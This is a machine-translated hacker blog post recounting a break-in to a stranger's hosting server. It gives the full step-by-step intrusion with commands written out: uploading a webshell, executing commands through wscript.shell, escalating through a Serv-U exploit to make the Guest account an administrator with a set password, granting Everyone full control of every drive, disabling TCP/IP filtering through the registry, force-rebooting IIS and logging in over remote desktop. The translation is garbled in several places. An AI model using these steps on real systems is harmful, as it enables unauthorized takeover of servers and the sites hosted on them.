Lvhuana
1: Get WebShell
A small test this evening, because I am too nickn, I will not, I can only do this ..........
Everything has passed, there is no way to make up, I hope to understand this little post.
Today is a boring day, I am not bored at night, I have to go to a video chat site to see show, 嘿嘿 ~
Suddenly found a special fire of a chat room, the number of people had 500 people (full), brush N times, did not go in .......... More depressed! ()
Think about anything, there is no matter what to do, test the host security, huh, huh, too (too dish, saying that people safety is really raising yourself)
Ping under CMD got the other party's IP, then log in
http://whois.Webhosting.info/ The other ip Take a look at the other site, ha, this is new, there are dozens of sites, it is estimated that I still find a two-hole site.
After a long search, I finally found a page of a way to use a vulnerability.
Http://www.xxxx.net/upfile_soft.asp, upload a WebShell (Haoyang 2005 official version) first (how to upload me, it is not coming, the upload tool is now full of days).
Second: Successfully improved permissions to establish users
After getting the WebShell, he was highly happy, and suddenly found any permissions, only in the directory where yourself is located (CDEF disk can't be browsed), even the permission to delete the file is not, depressed ... .....
Go back to 〖Server to see what the host has opened a service, after discovering that he opened the terminal service and serv-u service, ha, this has a head ^ _ ^ Scan his IP with SuperScan, really Banner seeing the serv-u, version 5.0 he used.
To 〖wscript.shell, let's try to execute the CMD command. You can't, if you enter the net user, you don't have it, then you can perform the CMD command through wscript.shell, and then enter the NET USER. Return each other's User list, haha, this It's good, I can get it! !
Upload SERV-U lifting tool to D: / A004 / TGGTWE / ****. COM / UPLOADSOFT directory below, rename: test.exe, then return to 〖wscript.shell to execute commands, 嘿嘿, immediately Only fat chicken is going to hand, happy ing ~
Execute the CMD command via wscript.shell:
D: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "net user guest / activ: yes" #Luth Guest account, I like this account
D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "Net User Guest Lvhuana" # Set the password of the GUEST account to Lvhuana
D: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "Net localgroup administrators guest / add" # 提 Guest rights to Admin privileges
Ok, the account is established, and the net localgroup administrators see success, and it is successful. Then when you perform NetStat -an, you see the terminal port of his open is the default 3389, OK, the connection is try ~ 3: Solve TCP / IP filtering
Can not connect! ? Halo ........... I took out Superscan to sweep his 3389, couldn't sweep at all ...... (opened firewall!? Rely, my little back .. ...)
There is no way, return to WScript.shell again to execute the CMD command:
D: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "Cacls.exe C: / E / T / G Everyone: f" # Set the C disk to Everyone can be viewed
D: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "Cacls.exe D: / E / T / G Everyone: f" Set the D disk to Everyone can be viewed
D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "Cacls.exe E: / E / T / G Everyone: f" # Set the E disk to Everyone can be viewed
D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "Cacls.exe f: / e / t / g everyone: f" # Set the F disk to Eveyone can be viewed
At this minimum, you can traverse the entire hard drive. I have turned around in the hard drive. I haven't found his firewall file all over the hard drive. I have a number in my heart. It is definitely he for TCP / IP screening! (Of course, there is also the possibility of the internal network, the specific family can be judged according to ipconfig -all)
Breakthrough TCP / IP Filter We can change his registry to achieve, what we have to do is to export three of his registry, then import it, return to 〖wscript.shell execute the CMD command:
D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "regedit-E d: / a004 / tggtwe / ****. Com / uploadsoft / 1.reg hkey_local_machine / system / controlset001 / service / TCPIP "# Export the first place for TCP / IP filtering in the registration table
D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "regedit -e d: / a004 / tggtwe / ****. Com / uploadsoft / 2.reg hkey_local_machine / system / controlset002 / service / TCPIP "# 导出 册 册 图 表 表 表 表 表
D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "regedit-E d: / a004 / tggtwe / ****. Com / uploadsoft / 3.reg hkey_local_machine / system / currentControlset / Services / TCPIP "# 导出 注 注 第 关于 表 关于 表 第 第 第
Then return to 〖stream〗 or 〖fso〗 found 1.Reg, 2.Reg, 3.Reg is quiet, 嘿 ~
Download 1.REG, 2.REG, 3.REG to come back to your hard drive, change the TCP / IP screening, first open 1.Reg to find "EnableSecurityFilters" = DWORD: 00000001 The number of faces is changed to 0, then change 2.Reg, 3.Reg, change the method, I will no longer be more than Luo ~ Then we will transfer 1.reg, 2.reg, 3.REG back to each other Inside the machine (here we want to select override mode, because there is no permission to delete the original 1.Reg, 2.Reg, 3.REG), then return to 〖wscript.shell after the upload is successful:
D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "regedit -s d: / a004 / tggtwe / ****. Com / uploadsoft / 1.REG" # 安 静 模式 模式End 1.REG imported to his registry
D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "regedit -s d: / a004 / tggtwe / ****. Com / uploadsoft / 2.REG" # 安静 模式 模式 模式 模式 模式End 2.REG imported to his registry
D: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "regedit -s d: / a004 / tggtwe / ****. Com / uploadsoft / 3.REG" # 安静 模式 模式End 3.REG imported to his registry
OK! After importing his machine, you can solve the TCP / IP filtering problem, and then perform the cmd command in WScript.Shell:
D: / A004 / TGGTWE / ****. Com / upload / test.exe "Iisreset / Reboot / Timeout: 00" # Using his own IIS service to restart his machine, / timeout: 00 This parameter is let He immediately restarted
After the execution, we couldn't sweep him again. Hey ~ has been restarted!
4: Successful terminal landing
After a long waiting (in fact, the time is not long, just I can't wait here, 嘿嘿 ~), I can finally sweep him with SuperScan, and can sweep to his 3389 port, haha, finally succeeded, take The terminal lander is smoothly used in the User: Guest, Pass: Lvhuana, which has been established!
Ok, this garbage article will be over, it has been over, and it's also the collection ~ because I am too nick, the wrong place is definitely inevitable, let everyone laugh, and I hope everyone is correct!
(If there is a reprint, please bring the author information, it is not easy to write, so long ...........)
